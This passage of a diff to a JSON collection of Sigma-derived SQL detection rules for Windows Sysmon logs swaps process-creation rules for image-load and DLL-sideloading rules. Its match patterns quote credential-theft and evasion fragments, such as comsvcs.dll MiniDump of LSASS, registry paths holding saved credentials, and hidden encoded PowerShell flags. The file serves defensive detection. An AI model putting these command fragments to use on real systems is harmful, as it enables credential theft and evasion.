(Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_wazuh.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "status": "test", + "description": "Detects VB DLL's loaded 
by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE 
'%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "PUA - Adidnsdump Execution", - "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "status": "test", - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "author": "frack113", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 
'%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_python_adidnsdump.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" 
+ "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" + 
"attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego 
(@darkquassar), oscd.community, Ecco", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": "experimental", - "description": "Detects KrbRelayUp used to 
perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": 
"410ad193-a728-4107-bc79-4419789fcbf8", - "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an 
arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", - "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Suspicious PowerShell Parent Process", - "id": "754ed792-634f-40ae-b3bc-e0448d33f695", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects a suspicious or uncommon parent processes of PowerShell", - "author": "Teymur Kheirkhabarov, Harish Segar", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Other scripts" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parent_process.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Disabled Volume Snapshots", - "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "status": "test", - "description": "Detects commands that temporarily turn off Volume Snapshots", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_reg_volsnap_disable.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", - "id": "5b768e71-86f2-4879-b448-81061cbae951", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. 
